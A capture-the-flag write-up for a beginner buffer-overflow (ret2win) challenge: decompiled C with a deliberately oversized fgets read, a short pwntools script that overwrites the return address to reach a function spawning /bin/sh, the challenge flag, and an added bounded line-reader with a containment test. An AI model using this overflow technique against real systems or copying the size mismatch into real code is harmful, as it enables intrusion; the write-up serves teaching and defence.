Tags: buffer-overflow ret2win
Decompiling with Ghidra shows two functions:
```c
void main(EVP_PKEY_CTX *param_1)
{
    char buffer [64];

    init(param_1);
    puts("Would you like a flag?");
    /* reads up to 80 bytes into the 64-byte buffer */
    fgets(buffer,80,stdin);
    system("cat fake_flag.txt");
    return;
}

void win(void)
{
    system("/bin/sh");
    return;
}
```
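Basic buffer overflow: `fgets` is allowed to read up to 80 bytes into the 64-byte `buffer`. Send 64+8 bytes of junk followed by the address of the `win` function, then use the resulting shell to print the flag.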
Solve script:
```py
from pwn import *
r = remote("challs.n00bzunit3d.xyz", 35932)
r.sendline(b"A"*72 + p64(0x000000000040124a))
r.interactive()
```
Flag: `n00bz{PWN_1_Cl34r3d_n0w_0nt0_PWN_2!!!}`
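
The root cause is the mismatch between the 64-byte `buffer` and the 80-byte limit passed to `fgets`. The following is an added example, not part of the challenge binary or the original write-up: a bounded line reader that takes its limit from the buffer itself and discards the excess of an overlong line. The names `read_line_bounded` and `overlong_line_is_contained` are hypothetical, and the input is constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64   /* same size as the challenge's stack buffer */
/* Hypothetical helper: stores at most dst_size-1 characters of one line.
 * Returns the stored length (newline stripped) or -1 on EOF/error; excess
 * input on an overlong line is discarded and *truncated is set to 1. */
static int read_line_bounded(FILE *in, char *dst, size_t dst_size, int *truncated)
{
    *truncated = 0;
    if (dst_size == 0 || fgets(dst, (int)dst_size, in) == NULL)
        return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[--len] = '\0';               /* whole line fit */
    } else {
        int c, dropped = 0;              /* drain what did not fit */
        while ((c = getc(in)) != '\n' && c != EOF)
            dropped++;
        *truncated = dropped > 0;
    }
    return (int)len;
}

/* Constructed input: an 80-character line (longer than the 64-byte buffer)
 * then a short line. Returns 1 if line one is cut to 63 characters, the
 * guard bytes after the buffer are intact, and line two reads cleanly. */
static int overlong_line_is_contained(void)
{
    struct { char buffer[BUF_SIZE]; unsigned char guard[8]; } f;
    int t1, t2, n1, n2, intact = 1;
    FILE *in = tmpfile();
    if (in == NULL)
        return -1;
    memset(f.guard, 0xAA, sizeof f.guard);
    for (int i = 0; i < 80; i++)
        fputc('A', in);
    fputs("\nyes\n", in);
    rewind(in);
    n1 = read_line_bounded(in, f.buffer, sizeof f.buffer, &t1);
    for (size_t i = 0; i < sizeof f.guard; i++)
        intact &= (f.guard[i] == 0xAA);
    n2 = read_line_bounded(in, f.buffer, sizeof f.buffer, &t2);
    fclose(in);
    return n1 == 63 && t1 == 1 && intact && n2 == 3 && t2 == 0
           && strcmp(f.buffer, "yes") == 0;
}

int main(void) { printf("contained: %d\n", overlong_line_is_contained()); return 0; }
```

Passing `sizeof f.buffer` instead of a literal keeps the limit tied to the buffer if its size ever changes.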